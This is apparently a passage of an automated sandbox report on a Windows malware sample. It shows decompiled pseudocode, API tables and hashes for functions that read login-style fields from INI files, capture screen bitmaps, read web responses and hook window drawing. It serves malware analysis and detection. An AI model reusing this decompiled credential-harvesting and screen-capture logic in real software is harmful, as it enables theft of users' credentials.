						__eflags = _t93;
						E0040CA33(_t57,  &_v608);
						_t59 = 0x5d;
						E0040CA33(_t59,  &_v588);
						_t61 = 0x5e;
						E0040CA33(_t61,  &_v576);
						_t63 = 0x5f;
						E0040CA33(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E0040A65E(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E0040CA33(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E00411DF9(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
													_t114 = _a4;
													_t87 = E004114FA(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E00411FF2(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E00411106(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E0040A711(_t120,  &_v524, _a4);
					goto L19;
				}
			}

0x0040a771
0x0040a78c
0x0040a94e
0x0040a956
0x0040a956
0x0040a792
0x0040a795
0x0040a7b3
0x0040a7b5
0x0040a7b9
0x0040a7bb
0x00000000
0x00000000
0x0040a7d2
0x0040a7d8
0x0040a7da
0x0040a948
0x0040a949
0x00000000
0x0040a949
0x0040a7e0
0x0040a7e5
0x0040a7ea
0x0040a7ec
0x00000000
0x00000000
0x0040a7f7
0x0040a7fc
0x0040a800
0x0040a802
0x0040a808
0x0040a808
0x0040a810
0x0040a814
0x0040a81c
0x0040a81d
0x0040a81d
0x0040a823
0x0040a82e
0x0040a82f
0x0040a83a
0x0040a83b
0x0040a846
0x0040a847
0x0040a84c
0x0040a866
0x0040a86c
0x0040a86e
0x0040a88a
0x0040a88c
0x0040a88f
0x0040a894
0x0040a8af
0x0040a8b5
0x0040a8b7
0x0040a8cb
0x0040a8d1
0x0040a8d3
0x0040a8d9
0x0040a8de
0x0040a8e0
0x0040a8e4
0x0040a8e8
0x0040a8e9
0x0040a8ee
0x0040a8ef
0x0040a8f5
0x0040a8f6
0x0040a900
0x0040a900
0x0040a906
0x0040a90b
0x0040a90e
0x0040a910
0x0040a912
0x0040a918
0x0040a91d
0x0040a91f
0x0040a921
0x0040a921
0x0040a921
0x0040a921
0x0040a91f
0x0040a910
0x0040a8e0
0x0040a8d3
0x0040a8b7
0x0040a894
0x0040a92a
0x0040a92f
0x0040a933
0x0040a933
0x0040a93f
0x0040a944
0x0040a944
0x00000000
0x0040a797
0x0040a79f
0x00000000
0x0040a79f

APIs

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

GetPrivateProfileStringW.KERNEL32 ref: 0040A7D2
GetPrivateProfileStringW.KERNEL32 ref: 0040A866
GetPrivateProfileIntW.KERNEL32 ref: 0040A884
GetPrivateProfileStringW.KERNEL32 ref: 0040A8AF
GetPrivateProfileStringW.KERNEL32 ref: 0040A8CB

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 927d9cb43296edb38ff9f7b3798621854bf2451ad09c5f4964ad00fdedf078b9
Instruction ID: e661de6012880e7b285b7bc4b6f38da2fa93c0ced890862ad578e7c9886cdfe8
Opcode Fuzzy Hash: 927d9cb43296edb38ff9f7b3798621854bf2451ad09c5f4964ad00fdedf078b9
Instruction Fuzzy Hash: 3F51B371604305ABD710DF61CC41FABB7E8FF84754F00093ABA84A72E1D739DA458B96

Uniqueness

Uniqueness Score: -1.00%

Function 00416D90, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416D90(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E004161F4(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E004161A4( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E004161A4( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E004161A4( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x00416d90
0x00416d90
0x00416d90
0x00416d98
0x00416dad
0x00416db1
0x00416db7
0x00416dbc
0x00416dc3
0x00416dcc
0x00416dcf
0x00416dd5
0x00416dfc
0x00416dfe
0x00416e04
0x00416dd7
0x00416dd9
0x00416ea1
0x00416ea1
0x00416ea5
0x00416ea5
0x00416ea5
0x00416eae
0x00416eb2
0x00416ddf
0x00416dec
0x00416def
0x00416dfa
0x00416e0e
0x00416e0e
0x00416e11
0x00000000
0x00000000
0x00416e17
0x00416e1b
0x00416e7b
0x00416e84
0x00416e89
0x00416e8b
0x00000000
0x00416e91
0x00416e93
0x00416e99
0x00416e9b
0x00000000
0x00000000
0x00000000
0x00000000
0x00416e9b
0x00416e1d
0x00416e20
0x00416e2c
0x00416e2f
0x00416e32
0x00416e34
0x00416e37
0x00416e3a
0x00416e79
0x00416e79
0x00416e79
0x00000000
0x00416e3c
0x00416e3c
0x00416e43
0x00416e43
0x00416e48
0x00000000
0x00416e4a
0x00416e50
0x00416e55
0x00416e57
0x00000000
0x00416e59
0x00416e67
0x00416e6a
0x00416e6d
0x00416e73
0x00416e75
0x00416e0c
0x00416e0c
0x00000000
0x00416e77
0x00000000
0x00416e77
0x00416e75
0x00416e57
0x00416e3e
0x00416e3e
0x00416e41
0x00000000
0x00000000
0x00000000
0x00000000
0x00416e41
0x00416e3c
0x00416e3a
0x00000000
0x00416e1b
0x00000000
0x00000000
0x00000000
0x00000000
0x00416dfa
0x00416dd9
0x00416dd5
0x00416eb7
0x00416ebd

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00416DB1

Part of subcall function 004161F4: GetFileSizeEx.KERNEL32(00416DC8,00416DC8,?,?,?,00416DC8,00000000), ref: 00416200

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 00416DF2
CloseHandle.KERNEL32(?,00000000), ref: 00416DFE
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00416E6D
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00416E93

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: 9ceb93a8348408447dc3fc6eb98dfe00057802ecaaaa929ba728ad1dcc490e41
Instruction ID: af5e63905789dcd979fed50711508695782ab0390cc234c6f94ae631fd7896fa
Opcode Fuzzy Hash: 9ceb93a8348408447dc3fc6eb98dfe00057802ecaaaa929ba728ad1dcc490e41
Instruction Fuzzy Hash: 2541BE34900349AAEF208F65CC45BEFBFB9EF84310F11422EE595A22A0C7398991CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004174C5, Relevance: 7.6, APIs: 5, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004174C5(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E004110D6(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E00411106(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x004174c5
0x004174d3
0x004174db
0x004174df
0x004175a7
0x004175aa
0x004175af
0x004175af
0x004175b5
0x004175bc
0x004175bc
0x004174f4
0x00417501
0x004175a1
0x004175a2
0x00000000
0x0041751d
0x00417520
0x00417529
0x00417534
0x00417536
0x00417537
0x0041753a
0x0041753d
0x0041754d
0x0041754d
0x00417550
0x00417552
0x00417555
0x00417555
0x00417556
0x0041755a
0x00417562
0x00417568
0x00417569
0x00417571
0x00417576
0x00417579
0x0041757e
0x00417580
0x00417580
0x00417590
0x00417596
0x0041759b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041759b
0x0041753f
0x00417542
0x00000000
0x00000000
0x00417547
0x00000000
0x00000000
0x00417549
0x00000000
0x00417549

APIs

GetDIBits.GDI32(00000000,00417F5D,00000000,00000001,00000000,00000000,00000000), ref: 004174FD
GetDIBits.GDI32(00000000,00417F5D,00000000,00000001,00000000,00000000,00000000), ref: 00417513
DeleteObject.GDI32(00417F5D), ref: 00417520
CreateDIBSection.GDI32(00000000,00000000,00000000,0041FE98,?,?), ref: 00417590
DeleteObject.GDI32(00417F5D), ref: 004175AF

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: BitsDeleteObject$CreateSection
String ID:
API String ID: 1423349713-0
Opcode ID: 0cfd237c4eef3904ea3a82b9894ab845c153d853e9ecbd1c360aed248bf78e22
Instruction ID: 8845a8ea70f08d9d83179162ad48cd3c6d6fc1a73520827836dd3c4a6c13790b
Opcode Fuzzy Hash: 0cfd237c4eef3904ea3a82b9894ab845c153d853e9ecbd1c360aed248bf78e22
Instruction Fuzzy Hash: 243193B210120ABFDF208F25CD849AB7ABAEF44344B04842EF646D6A60D735DD91DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040F97B, Relevance: 7.6, APIs: 5, Instructions: 92
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040F97B(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				char _v9;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v60;
				void* __esi;
				intOrPtr _t31;
				signed int _t32;
				char* _t37;
				intOrPtr* _t58;
				char _t61;
				intOrPtr* _t62;
				intOrPtr _t63;

				_t62 = __edi;
				ResetEvent(_a8);
				_t31 = E004110D6(0x1000);
				_t63 = 0;
				_v16 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E0040F932);
					_t61 = 0x28;
					_v20 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v9 = 1;
					E004111B9( &_v60,  &_v60, 0, _t61);
					_v60 = _t61;
					_v40 = _v16;
					while(1) {
						L3:
						_t37 =  &_v60;
						_v36 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t63);
						if(_t37 == 0) {
							break;
						}
						if(_v36 == _t63) {
							L10:
							asm("sbb eax, eax");
							 *_t58(_a4,  ~(_v20 + 1) & _v20);
							E00411106(_v16);
							if(_v9 == 0) {
								E00411106( *_a12);
							}
							return _v9;
						}
						_t64 = _a12;
						if(E00411091( *_t62 + _v36, _a12) == 0) {
							L9:
							_v9 = 0;
							goto L10;
						}
						E00411142( *_t64 +  *_t62, _v16, _v36);
						 *_t62 =  *_t62 + _v36;
						_t63 = 0;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					}
					E0041474D( &_a8);
					goto L3;
				}
				E00411106(0);
				return 0;
			}

0x0040f97b
0x0040f986
0x0040f991
0x0040f996
0x0040f998
0x0040f99d
0x0040f9ac
0x0040f9ba
0x0040f9be
0x0040f9bf
0x0040f9c6
0x0040f9cd
0x0040f9cf
0x0040f9d3
0x0040f9db
0x0040f9de
0x0040f9e1
0x0040f9e1
0x0040f9e4
0x0040f9eb
0x0040f9f2
0x0040f9fa
0x00000000
0x00000000
0x0040fa17
0x0040fa49
0x0040fa4f
0x0040fa58
0x0040fa5d
0x0040fa66
0x0040fa6d
0x0040fa6d
0x00000000
0x0040fa72
0x0040fa1e
0x0040fa28
0x0040fa45
0x0040fa45
0x00000000
0x0040fa45
0x0040fa37
0x0040fa3f
0x0040fa41
0x0040fa41
0x0040fa07
0x00000000
0x00000000
0x0040fa0d
0x00000000
0x0040fa0d
0x0040f9a0
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 0040F986
InternetSetStatusCallbackW.WININET(?,0040F932), ref: 0040F9BA
InternetReadFileExA.WININET(?,?,00000008,00000000), ref: 0040F9F2
GetLastError.KERNEL32 ref: 0040F9FC
InternetSetStatusCallbackW.WININET(?,?), ref: 0040FA58

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: 852f289fce787ac1969f70afe0bc588cc0404e9f859c9d8082bdff31d1b9dc91
Instruction ID: 3012ed8b2ed201dd0237cfda8da11f943c7df3a384b5cbea96ddeadc3d2aed2a
Opcode Fuzzy Hash: 852f289fce787ac1969f70afe0bc588cc0404e9f859c9d8082bdff31d1b9dc91
Instruction Fuzzy Hash: A6314771900219BFCF11EFA5DC45AEEBBB8BF08348F044076F944A72A1D7789994CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00418B1A, Relevance: 7.6, APIs: 5, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418B1A(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E0040CA33(_t18,  &_v32);
				if(E00416745(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E0040C9FD(_t26,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E0041621B( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E00411C43(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x00418b27
0x00418b2a
0x00418b2b
0x00418b2e
0x00418b30
0x00418b46
0x00418bfc
0x00418c00
0x00418c00
0x00418b65
0x00418b6b
0x00418b71
0x00000000
0x00000000
0x00418b80
0x00418b81
0x00418b83
0x00418ba7
0x00418bd8
0x00418bdb
0x00418be4
0x00418bed
0x00418bf6
0x00418bf6
0x00000000
0x00418bae
0x00418bae
0x00418bb3
0x00418bd2
0x00418bd2
0x00000000
0x00418bd2
0x00418bbc
0x00418bcb
0x00418bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00418bcb

APIs

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00418B65
WriteFile.KERNEL32(00418B02,?,00000146,?,00000000,00000000), ref: 00418BA3
WriteFile.KERNEL32(00418B02,?,00000000,?,00000000), ref: 00418BC7
FlushFileBuffers.KERNEL32(00418B02), ref: 00418BDB
CloseHandle.KERNEL32(00418B02), ref: 00418BE4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID:
API String ID: 2459967240-0
Opcode ID: d06bc370a8dffb5ac8c15034394ae1eab505b718bb91091fc3a3f67d009960cb
Instruction ID: ddd1bfeaa9147b330be2aec40cbb85618cfe323044223405ff1c74036eb9d3c8
Opcode Fuzzy Hash: d06bc370a8dffb5ac8c15034394ae1eab505b718bb91091fc3a3f67d009960cb
Instruction Fuzzy Hash: 8021BFB1940118BBCF20AB61CC45FDF7BBCAB45314F1042AAB504F3190DB35AE81CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB2, Relevance: 7.6, APIs: 5, Instructions: 71
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB2(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				void* _t24;
				long _t28;
				long _t35;
				void* _t40;
				WCHAR* _t43;
				void* _t50;

				_t50 = __eflags;
				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E004069FD(_t40, _t50, 0xf7b027d4, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E004069C2(0xc003c81e,  &_v204, 0);
					_t43 =  &_v724;
					E00406D1E(_t40, _t43, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E00411C55(_t43);
					_t24 = E00406B23();
					__eflags = _t24;
					if(_t24 == 0) {
						L7:
						E004147B3(_v12);
						__eflags = 0;
						return 0;
					}
					E0040CA33(0,  &_v104);
					_t28 = WaitForSingleObject( *0x41ea9c, 0xc8);
					__eflags = _t28 - 0x102;
					if(_t28 != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E0041522E(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
						_t35 = WaitForSingleObject( *0x41ea9c, 0xc8);
						__eflags = _t35 - 0x102;
					} while (_t35 == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x00405cb2
0x00405cb2
0x00405cc4
0x00405cd1
0x00405cd6
0x00405cdb
0x00405cf2
0x00405cf9
0x00405cff
0x00405d07
0x00405d0d
0x00405d14
0x00405d17
0x00405d1c
0x00405d1e
0x00405d7c
0x00405d7f
0x00405d84
0x00000000
0x00405d86
0x00405d27
0x00405d3e
0x00405d43
0x00405d45
0x00405d7a
0x00000000
0x00405d7b
0x00405d4e
0x00405d51
0x00405d68
0x00405d74
0x00405d76
0x00405d76
0x00000000
0x00405d51
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 00405CBD
SetThreadPriority.KERNEL32(00000000), ref: 00405CC4

Part of subcall function 004069FD: CreateMutexW.KERNEL32(0041E5C8,00000000,?,?,?,?,?), ref: 00406A1E

PathQuoteSpacesW.SHLWAPI(?,00000001,C003C81E,?,00000000,?,F7B027D4,00000001), ref: 00405D07
WaitForSingleObject.KERNEL32(000000C8,?,?,?,F7B027D4,00000001), ref: 00405D3E
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,F7B027D4,00000001), ref: 00405D74

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: 63adb9bd918dbbf607ef7279a227f78cdb634426369938d8cc968c84cd39e481
Instruction ID: 8628f203322232fd24c6a974c4b0cf549ed89b50ca26a13031dcba1933e09a46
Opcode Fuzzy Hash: 63adb9bd918dbbf607ef7279a227f78cdb634426369938d8cc968c84cd39e481
Instruction Fuzzy Hash: 35218E71A00608AEDF10ABA0DD49FEE7BB9EF44344F1044B6F905F71A1DA389E858F58

Uniqueness

Uniqueness Score: -1.00%

Function 00414505, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 00414517
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 00414541
WSAGetLastError.WS2_32 ref: 00414548
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414574

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

closesocket.WS2_32(?), ref: 00414588

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
String ID:
API String ID: 2355469559-0
Opcode ID: ed66087fac3d01aff63777bcbaadb0e7481c36297b866ade3ee5f9b77589b154
Instruction ID: 40a1ef576042988080b874db43333e93dcdccbbe38b342f44f900c88b808c770
Opcode Fuzzy Hash: ed66087fac3d01aff63777bcbaadb0e7481c36297b866ade3ee5f9b77589b154
Instruction Fuzzy Hash: 641151B1801128BFCB109FA6DD48CDF7E3DEF453A4B104615F605A2160D6349F80DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BF9, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00417BF9(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x41e590 & 0x00000004) == 0 || E00406B23() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x41fe7c);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E00411142( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x00417c04
0x00417c08
0x00417c79
0x00000000
0x00417c13
0x00417c1f
0x00417c23
0x00000000
0x00417c2a
0x00417c2e
0x00417c32
0x00417c3a
0x00417c3a
0x00417c43
0x00417c49
0x00417c59
0x00417c61
0x00417c68
0x00417c6b
0x00417c71
0x00417c75
0x00000000
0x00417c75
0x00417c23

APIs

GetUpdateRect.USER32 ref: 00417C80

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

TlsGetValue.KERNEL32 ref: 00417C19
SaveDC.GDI32(?), ref: 00417C49
SendMessageW.USER32(?,00000014,?,00000000), ref: 00417C59
RestoreDC.GDI32(?,00000000), ref: 00417C6B

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: e6ac6a8f29ece36e84aab840dca4c2c3a9e1bb18d26acaaa8b9c18a39ca4386b
Instruction ID: f8323f6d0f1f5df3ecf16503b86fdfae8f5e8557247354b8ac0f787962a5127d
Opcode Fuzzy Hash: e6ac6a8f29ece36e84aab840dca4c2c3a9e1bb18d26acaaa8b9c18a39ca4386b
Instruction Fuzzy Hash: 0111C231004305EFCB319F61DD48FDB7BB9EB09310F04892AFA9692271DB399480CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00417D20, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00417D20() {
				struct tagMSG _v32;
				signed int _t12;
				char _t17;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x41fe84);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					if(_t12 == 0) {
						break;
					}
					if(_v32.message ==  *0x41fe80 && _v32.wParam == 0xfffffffc) {
						_t17 = E004176A1( *0x41fe88 + 0x114, _t19, _t21, 0x41fe78, _v32.lParam, 1);
						_t19 =  *0x41fe88;
